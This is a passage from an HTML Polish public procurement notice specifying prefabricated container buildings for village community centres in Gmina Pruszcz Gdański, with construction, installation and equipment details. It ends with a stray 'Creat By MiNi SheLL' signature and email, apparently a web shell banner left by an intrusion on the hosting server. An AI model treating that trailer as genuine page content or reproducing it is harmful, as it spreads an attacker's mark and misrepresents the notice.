<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budynek jest parterowy niepodpiwniczony z wykorzystaniem gotowych standardowych 5szt kontenerów stalowych o wymiarach 6500 x 2600 x 3150, w tym 1 szt. o niestandardowym wnętrzu i wyposażeniu, całość połączona i  przykryta dachem drewnianym  dwuspadowym. Budynek nie związany na stale z gruntem , ustawiony na bloczkach betonowych na  utwardzonym gruncie .
1.	Dane liczbowe :
Powierzchnia użytkowa  - 76,10 m2
Powierzchnia zabudowy  - 84,50 m2
Kubatura - 338,00 m3
2.	 Opis budynku : 
FUNDAMENTOWANIE - zastosowano betonowe stopy fundamentowe o wym. 380x250x140 ( dla każdego kontenera po min. 6 pkt podparcia) , posadowienie stóp fundamentowych  - należy podłoże utwardzić  w obrysie budynku : na warstwie 30 cm piasku ułożyć płyty ażurowe typu JOMB o wym. 1000 x 750 x 125 lub kostkę brukową gr. 8 cm , utworzoną przestrzeń pod kontenerami o wys. 14 cm należy zamknąć płytami prefabrykowanymi betonowymi o wys30cm  i gr. 3cm  tworząc podmurówkę budynku  (16 cm poniżej gruntu )
RAMA NOŚNA - profile zimno-gięte gr.3 i 4mm , poszycie zewn.:blacha trapezowa T35 #0.7 mm, ocynk., powlekana
DACH - wiązary drewniane szt. 14 usztywnione płytami OSB , między wiązarami wełna mineralna o gr. 12 cm,, ruszt wsporczy ,wełna mineralna gr.80 mm (kl. reakcji na ogień A1), blacha trapezowa dachowa - profil 20, grubość min 0,5mm ,płyta warstwowa z rdzeniem ze styropianu o gr. 50 mm i okładzinami z blachy stalowej ,ocynkowanej ,pokrytej powłoką poliestrową; okładziny płyty - gładkie , stopień rozprzestrzeniania ognia - NRO , izolacyjność cieplna U=0,275 W/m2xK, odpływy wody (rynny odprowadzające do rur spustowych)
ZADASZENIA nad wejściem zaprojektowano jako wydłużone elementy wiązarów dachowych. 
TRÓJKĄTNE ŚCIANY SZCZYTOWE - płyta OSB , a na niej deska o gr 2,2 cm ułożona poziomo na zakład
PODESTY przed drzwiami wejściowymi , dwa stopnie  zewnętrzne oraz podjazd dla niepełnosprawnych (bez barierek) warstwy patrząc od dołu: podsypka piaskowa o gr. 15 cm , chudy beton o gr. 10 cm oraz kostka brukowa o gr. 6 cm
ŚCIANY ZEWNĘTRZNE
płyta warstwowa z rdzeniem ze styropianu o gr. 150 mm i okładziną z blachy    
stalowej ocynkowanej pokrytej powłoką poliestrową , zewnętrzna okładzina 
płyty profilowana , wewnętrzna gładka stopień rozprzestrzeniania ognia - NRO,
izolacyjność cieplna U=0,255 W/m2xk
ŚCIANY DZIAŁOWE ,ODDZIELAJĄCE POMIESZCZENIA WEWNĘTRZNE
 płyta warstwowa z rdzeniem ze styropianu o gr.100 mm i okładziną z blachy   
stalowej ocynkowanej pokrytej powłoką poliestrową, zewnętrzna i wewnętrzna       
okładzina płyty gładka, stopień rozprzestrzeniania ognia - NRO
ŚCIANY I SUFIT OD WEWNĄTRZ
ocynkowana i powlekana blacha gr.0,5mm (część składowa płyty warstwowej)
PODŁOGA
- poszycie dolne: blacha ocynkowana gr. 0,5mm
- poprzeczki z profili stalowych , zimnogiętych
- wełna mineralna gr. 120 mm ( kl. Reakcji na ogień A1)
 płyta podłogowa OSB gr. 22 mm (kl reakcji na ogień Dfl-s1)
- izolacyjność cieplna U=0,285 W/m2K
KOLORYSTYKA:
- rama - w kolorze wg RAL 8004 ( miedziano-brązowy)
- ściany zewnętrzne - blacha w kolorze wg RAL 1002 ( Żółto-piaskowy)
- ściany wewnętrzne - w kolorze wg RAL 9002 ( biały)
- sufit - w kolorze wg RAL 9002 (biały)
- drzwi zewnętrzne - w kolorze wg RAL 8004 ( miedziano-brązowy)
- drzwi wewnętrzne - białe
 obróbki blacharskie - w kolorze wg RAL 8004 ( miedziano-brązowy)
- okna i obramowania okien - w kolorze wg RAL 8004 ( miedziano-brązowy)
- rolety zewnętrzne - w kolorze wg RAL 8004 ( miedziano-brązowy)
WYKŁADZINA
- PCV klejona , dwuwarstwowa (klasyfikacja w zakresie reakcji na ogień Bfl-s1) , listwa przypodłogowa PCV
DRZWI ZEWNĘTRZNE:
 - o wym. 100X200 - stalowe , izolowane , zamek z wkladką patentową,szyld z klamką 3  klucze , 2 trzpienie przeciwwyważeniowe po stronie zawiasów , samozamykacz , okapnik zewnętrzny, szt.2
- próg drzwi zewnętrznych - aluminiowy z  blachy antypoślizgowej szt. 1 , wewnętrzny  najazd w  WC dla niepełnosprawnych szt. 1
DRZWI WEWNĘTRZNE:
-  wym. 90x200 - płytowe z otworami wentylacyjnymi , bez zamków , szt. 3 w  tym 1 szt. wewnętrzny najazd w WC dla niepełnosprawnych 
OKNA:
- o wym. 56,5 x 53,5 - PCV-U uchylne , 170 cm powyżej podłogi , szt.2
- o wym. 120 x 160 - PCV-R/U  rozwieralno-uchylne , 85 cm powyżej podłogi , szt. 7
- rolety zewnętrzne aluminiowe  wypełnione odporną , twardą żywicą poliestrową zamykane mechanicznie od wewnątrz , szt. 7 , 
WENTYLACJA:
- KW - kratka grawitacyjna - nawietrzniki wentylacyjne O 150 z żaluzją , szt.4
- KWE - wyciągowa - kratka wentylacyjna z wentylatorem elektrycznym , wydajność 150 m3/h , w sanitariatach uruchamiana razem z oświetleniem , szt.4	
ODPRAOWADZENIE WÓD OPADOWYCH :
Wody opadowe z dachu odprowadzić rynnami i rurami  spustowymi do  skrzynek rozsączajacych  2szt wym. 1200 x 600 X 300mm w obsypce żwirowej gr. 30cm w otulinie z geowłókniny ułożone na min. gł. 1m.
POSADOWIENIE KONTENERA:
- kostki fundamentowe (wym. np.  380x250x140) rys. nr 2
INSTALACJE ELEKTRYCZNE:
- okablowanie natynkowe w listwach PCV układane na ścianach i sufitach
- gniazdka wtyczkowe 230V :podwójne natynkowe (w tym 2 szt. Hermetyczne) - szt 17
- oświetlenie : lampa 2x36 W - szt. 13 ,lampa 40/60 W, hermetyczna - szt.4
- wyłącznik - jednobiegunowy , natynkowy , szt.7
- PE - przyłącze elektryczne - wejście od spodu przez przelotkę w podłożu otworem ?  50,szt. 1
- RG - rozdzielnica główna - wewnątrz kontenera (pod sufitem) , z zabezpieczeniami (wyłącznik różnicowo-prądowy , wyłączniki nadprądowe typu S) , szt. 1
INSTALACJA WODNO-KANALIZACYJNA:
     - cała instalacja (orurowanie PCV) na ścianach , odpływ ? 110 , zasilanie wody PE 32    
       z  zaworkiem odcinającym wewnątrz kontenera, studnia wodomierzowa  PCV
     - spadki instalacji umożliwiające wypuszczenie wody
     - pozioma instalacja zabudowana w aluminiowych cokołach maskujących
     - PW - przyłącze wody - otwór w podłodze , przyłącze wewnątrz kontenera , szt.1
     - OW - odpływ wodny - wyjście przez podłogę , przyłącze pod kontenerem , szt. 1
     -  zbiornik bezodpływowy na  ścieki o poj. 6m3 z żywic poliestrowych
INSTALACJA  GAZOWA, CO
       - przyłącze gazowe - rura PE dn 32 na dł. 27m
       - szafka gazowa nr.1 z zaworem głównym dn50mm 
       - szafka gazowa na budynku nr 2 z podejściem stalowym dn 25mm na kurek pomocniczy
       - przewody gazowe w budynku -  rurą stalową bez szwu dn 25 do kotła i kuchenki gazowej               
          czteropalnikowej
       - kocioł dwufunkcyjny wiszący z  zamkniętą komorą  spalania 10KW
       - rurociągi do ogrzewania grzejnikowego polipropylenowe dn 16x2,7 i 20x3,4
       - grzejniki blaszane  z podejściem od dołu, z głowicami termostatycznymi z czujnikiem wbudowanym
WYPOSAŻENIE:
     - grzejniki w WC  -, szt. 2
     - grzejnik w kuchni, szt. 1    
     - grzejniki w świetlicy , szt. 6
     - wc  kompakt - komplet - ceramiczna miska ustępowa , zbiornik, deska, w tym jeden dla niepełnosprawnych szt. 1 + 1
     - pochwyty dla niepełnosprawnych - montowany do podłogi i  uchylny -  dla muszli i umywalki,  razem szt.3 , stały ścienny  - szt. 1
     - umywalka - szer. 450 , z baterią , szt. 1 , dla niepełnosprawnych , z baterią z prysznicem   
       (z uchwytem na ścianie) - szt. 1
     - dwufunkcyjny kocioł gazowy, pionowy , o mocy 10KW wiszący o szer. 440,gł.338,wys.800 - szt.1 
     - komin spalinowy zewnętrzny , ze stali nierdzewnej , zaizolowany , o wysokości min.  50 cm powyżej kalenicy dachu
     - zlewozmywak jednokomorowy z ociekaczem ze stali nierdzewnej , szt. 1
     - kuchenka gazowa, czteropalnikowa z piekarnikiem elektrycznym , szt. 1
    - kurtyna powietrzna przeznaczona do  montażu na wysokości 2,5 m , o szerokości 102 cm ,z wymiennikiem elektrycznym 3 KW , sterowanie za pomocą natynkowych paneli , z wyłącznikiem krańcowym
    - okap podszafkowy - wym. 50x12x50 , moc 150 W , 1 silnik wentylatora ,średnica wylotu powietrza = 12 cm ,długość przewodu przyłączeniowego =14 cm , tryp pracy - wyciąg lub pochłaniacz , stopnie prędkości pracy = 3 , wydajność = 320 m3/h , poziom hałasu = 52 dBA , oświetlenie = 1 żarówka 40 W , rodzaj filtra - aluminiowy przeciwtłuszczowy ,

3.	Zagospodarowanie działki :
- Utwardzone dojście i plac przed budynkiem z kostki betonowej gr.6cm kolorowej w obrzeżu betonowym o pow, 98,50m2
- utwardzone miejsca postojowe wzdłuż ulicy Lipowej z kostki betonowej gr. 8cm,  w krawężniku betonowym
- zieleń -  trawniki na pow. 559m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.30.00.00-0, 45.40.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa budynku świetlicy wiejskiej w Świńczu, dz. nr 160/1 w Gminie Pruszcz Gdański.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budynek jest parterowy niepodpiwniczony z wykorzystaniem  gotowych standardowych 3-ch szt  kontenerów o wymiarach 6500 x 2600 x 3150 w tym 1 szt o niestandardowym wnętrzu i wyposażeniu, przykrytych dachem drewnianym  dwuspadowym. Budynek nie  związany stale z gruntem , ustawiony na bloczkach betonowych na  utwardzonym gruncie .
1.	Dane liczbowe :
Powierzchnia użytkowa  - 50,70 m2
Powierzchnia zabudowy  - 44,30 m2
Kubatura - 159,70 m3
2.	 Opis budynku : 
FUNDAMENTOWANIE - zastosowano betonowe stopy fundamentowe o wym. 380x250x140 ( dla każdego kontenera po min. 6 pkt podparcia) , posadowienie stóp fundamentowych  - należy podłoże utwardzić  w obrysie budynku : na warstwie 30 cm piasku ułożyć płyty ażurowe typu JOMB o wym. 1000 x 750 x 125 lub kostkę brukową gr. 8 cm , utworzoną przestrzeń pod kontenerami o wys. 14 cm należy zamknąć płytami prefabrykowanymi betonowymi o wys. 30cm  i gr. 3cm  tworząc podmurówkę budynku.
KONTENER : konstrukcja  ramy nośnej - profile zimno-gięte gr.3 i 4mm , poszycie zewn.:blacha trapezowa T35 #0.7 mm, ocynk., powlekana
DACH - wiązary drewniane szt.  9 usztywnione płytami OSB , między wiązarami wełna mineralna o gr. 12 cm, ruszt wsporczy ,wełna mineralna gr.80 mm (kl.  reakcji na ogień A1), blacha fałdowa trapezowa dachowa - profil 20, grubość min 0,5mm, płyta warstwowa z rdzeniem ze styropianu o gr. 50 mm i okładzinami z blachy  stalowej ,ocynkowanej ,pokrytej powłoką poliestrową; okładziny płyty - gładkie , stopień rozprzestrzeniania ognia - NRO , izolacyjność cieplna U=0,275 W/m2xK  
ZADASZENIE nad wejściem zaprojektowano jako wydłużone elementy wiązarów dachowych.
ŚCIANY SZCZYTOWE - płyta OSB  na niej deska o gr 2,2 cm ułożona poziomo na zakład
PODEST przed drzwiami wejściowymi , dwa stopnie  zewnętrzne oraz podjazd dla niepełnosprawnych (bez barierek ,spadek poniżej 6%) wykonać  z  kostki brukowej o gr. 6 cm na podsypce piaskowej o gr. 15 cm   i  chudym betonie o gr. 10 cm. 
ŚCIANY ZEWNĘTRZNE -  płyta warstwowa z rdzeniem ze styropianu o gr. 150 mm i okładziną z blachy stalowej ocynkowanej pokrytej powłoką poliestrową , zewnętrzna okładzina   płyty profilowana, wewnętrzna gładka stopień rozprzestrzeniania ognia - NRO, izolacyjność cieplna U=0,255 W/m2xk
ŚCIANY DZIAŁOWE ,ODDZIELAJĄCE POMIESZCZENIA WEWNĘTRZNE
płyta warstwowa z rdzeniem ze styropianu o gr.100 mm i okładziną z blachy   stalowej ocynkowanej pokrytej powłoką poliestrową, zewnętrzna i wewnętrzna okładzina   płyty gładka , stopień rozprzestrzeniania ognia - NRO

ŚCIANY I SUFIT OD WEWNĄTRZ
ocynkowana i powlekana blacha gr.0,5mm (część składowa płyty warstwowej)
PODŁOGA
      - przyjęto max. obciążenie - 200 kg/m2
      - poszycie dolne: blacha ocynkowana gr. 0,5mm
      - poprzeczki z profili stalowych , zimnogiętych
      - wełna mineralna gr. 120 mm ( kl. Reakcji na ogień A1)
      - płyta podłogowa OSB gr. 22 mm (kl reakcji na ogień Dfl-s1)
      - izolacyjność cieplna U=0,285 W/m2K
KOLORYSTYKA:
      - dach - blacha fałdowa w kolorze wg RAL 8004 ( miedziano-brązowy)
      - rama - w kolorze wg RAL 8004 ( miedziano-brązowy)
      - ściany zewnętrzne - blacha w kolorze wg RAL 1002 ( Żółto-piaskowy)
      - ściany wewnętrzne - w kolorze wg RAL 9002 ( biały)
      - sufit - w kolorze wg RAL 9002 (biały)
      - drzwi zewnętrzne - w kolorze wg RAL 8004 ( miedziano-brązowy)
      - drzwi wewnętrzne - białe
      - obróbki blacharskie - w kolorze wg RAL 8004 ( miedziano-brązowy)
      - okna i obramowania okien - w kolorze wg RAL 8004 ( miedziano-brązowy)
      - rolety zewnętrzne - w kolorze wg RAL 8004 ( miedziano-brązowy)
      - trójkątne ściany szczytowe - deski zabejcowane na kolor zbliżony do RAL 8004 (drewno należy  
        zabezpieczyć preparatami grzybobójczymi , wodoodpornymi i p/ogniowymi)
WYKŁADZINA
- PCV klejona , dwuwarstwowa (klasyfikacja w zakresie reakcji na ogień Bfl-s1) , listwa przypodłogowa PCV
DRZWI ZEWNĘTRZNE:
 - o wym. 100X200 - stalowe , izolowane , zamek z wkladką patentową,szyld z klamką 3  klucze , 2 trzpienie przeciwwyważeniowe po stronie zawiasów , samozamykacz , okapnik zewnętrzny, szt.1
- próg drzwi zewnętrznych - aluminiowy z  blachy antypoślizgowej szt. 1 , wewnętrzny  najazd w  WC dla niepełnosprawnych szt. 1
DRZWI WEWNĘTRZNE:
- o wym. 90x200 - płytowe z otworami wentylacyjnymi , bez zamków , szt. 3 w tym 1 szt. wewnętrzny najazd w WC dla niepełnosprawnych 
OKNA:
      - o wym. 56,5 x 53,5 - PCV-U uchylne , 170 cm powyżej podłogi , szt.2
      - o wym. 120 x 160 - PCV-R/U  rozwieralno-uchylne , 85 cm powyżej podłogi , szt. 4
      - rolety zewnętrzne aluminiowe  wypełnione odporną , twardą żywicą poliestrową zamykane  
        mechanicznie   od wewnątrz , szt. 4 , 
WENTYLACJA:
- KW - kratka grawitacyjna - nawietrzniki wentylacyjne O 150 z żaluzją , szt.2
- KWE - wyciągowa - kratka wentylacyjna z wentylatorem elektrycznym , wydajność 150 m3/h , w sanitariatach uruchamiana razem z oświetleniem , szt.4	

ODPRAOWADZENIE WÓD OPADOWYCH :
Wody opadowe z dachu odprowadzić rynnami i rurami  spustowymi do  skrzynek rozsączajacych  2szt wym. 1200 x 600 X 300mm w obsypce żwirowej gr. 30cm w otulinie z geowłókniny ułożone na min. gł. 1m.
POSADOWIENIE KONTENERA:
- kostki fundamentowe (wym. np.  380x250x140) cofnięte w głąb zewnętrznego obrysu zestawu kontenerów o 10 mm
INSTALACJE ELEKTRYCZNE:
     - okablowanie natynkowe w listwach PCV układane na ścianach i sufitach
     - gniazdka wtyczkowe 230V :podwójne natynkowe (w tym 2 szt. Hermetyczne) - szt 15)
     - oświetlenie : lampa 2x36 W - szt. 7 ,lampa 40/60 W, hermetyczna - szt.4
     - wyłącznik - jednobiegunowy , natynkowy , szt.6
     - PE - przyłącze elektryczne - wejście od spodu przez przelotkę w podłożu otworem ?  50,szt. 1
     - RG - rozdzielnica główna - wewnątrz kontenera (pod sufitem) , z zabezpieczeniami
       (wyłącznik różnicowo-prądowy , wyłączniki nadprądowe typu S) , szt. 1
INSTALACJA WODNO-KANALIZACYJNA:
     - cała instalacja (orurowanie PCV) na ścianach , odpływ ? 110 , zasilanie wody PE 32    
       z  zaworkiem odcinającym wewnątrz kontenera
     - spadki instalacji umożliwiające wypuszczenie wody
     - pozioma instalacja zabudowana w aluminiowych cokołach maskujących
     - PW - przyłącze wody - otwór w podłodze , przyłącze wewnątrz kontenera , szt.1
     - OW - odpływ wodny - wyjście przez podłogę , przyłącze pod kontenerem , szt. 1
WYPOSAŻENIE:
     - grzejnik elektryczny 0.5 kw - naścienny, na osobnych zabezpieczeniach , szt. 2
     - grzejnik elektryczny  1 kw - naścienny, na osobnych zabezpieczeniach , szt. 1    
     - grzejnik elektryczny  1,5  kw - naścienny, na osobnych zabezpieczeniach , szt. 1
     - wc kompakt - komplet - ceramiczna miska ustępowa , zbiornik, deska, w tym jeden dla
       niepełnosprawnych szt. 1 + 1
     - pochwyty dla niepełnosprawnych - montowany do podłogi i  uchylny -  dla muszli i umywalki,  razem    szt.3 , stały ścienny  - szt. 1
     - umywalka - szer. 450 , z baterią , szt. 1 , dla niepełnosprawnych , z baterią z prysznicem   
       (z uchwytem na ścianie) - szt. 1
     - pojemnościowy ogrzewacz wody - poziomy , wiszący pod sufitem , 60 l , długość=740 mm, średnica 460 mm - szt. 1 ,  
     - zlewozmywak jednokomorowy z ociekaczem ze stali nierdzewnej , szt. 1
     - kuchenka elektryczna z płytą ceramiczną  , czteropalnikowa z piekarnikiem elektrycznym , szt. 1
    - kurtyna powietrzna przeznaczona do  montażu na wysokości 2,5 m , o szerokości 102 cm ,z wymiennikiem elektrycznym 3 KW , sterowanie za pomocą natynkowych paneli , z wyłącznikiem krańcowym
    - okap podszafkowy - wym. 50x12x50 , moc 150 W , 1 silnik wentylatora ,średnica wylotu powietrza = 12 cm ,długość przewodu przyłączeniowego =14 cm , tryp pracy - wyciąg lub pochłaniacz , stopnie prędkości pracy = 3 , wydajność = 320 m3/h , poziom hałasu = 52 dBA , oświetlenie = 1 żarówka 40 W , rodzaj filtra - aluminiowy przeciwtłuszczowy ,
     - piec kaflowy na drewno - o wym. 75 x 40 x 120 , moc 6 KW , wylot spalin: 150 mm , paliwo drewno lub brykiet , ruszt żeliwny ,popielnik ,regulowany nawiew  do paleniska , nawiew powietrza na szybę (efekt czystej szyby) ,palenisko wyłożone wernikulitem , pojemna półka pod paleniskiem, komin spalinowy zewnętrzny , ze stali nierdzewnej , zaizolowany , o wysokości min. 50 cm powyżej dachu 
3.	Zagospodarowanie działki:
Utwardzony dojście i plac  przed budynkiem z kostki betonowej gr. 6cm kolorowej w obrzeżu betonowym, na podbudowie  z kruszywa betonowego o pow. 54,40m2
Utwardzony plac pieszo jezdny z połączeniem z istniejącą drogą brukową z płyt Meba  o gr. 10cm na podbudowie o pow. 80,70m2.
zieleń - wykonanie trawników na pow. 598,20m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.30.00.00-0, 45.40.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com